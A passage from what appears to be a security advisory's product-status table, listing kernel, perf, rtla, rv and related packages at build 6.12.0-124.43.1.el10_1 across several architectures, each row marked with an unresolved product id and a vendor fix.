| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
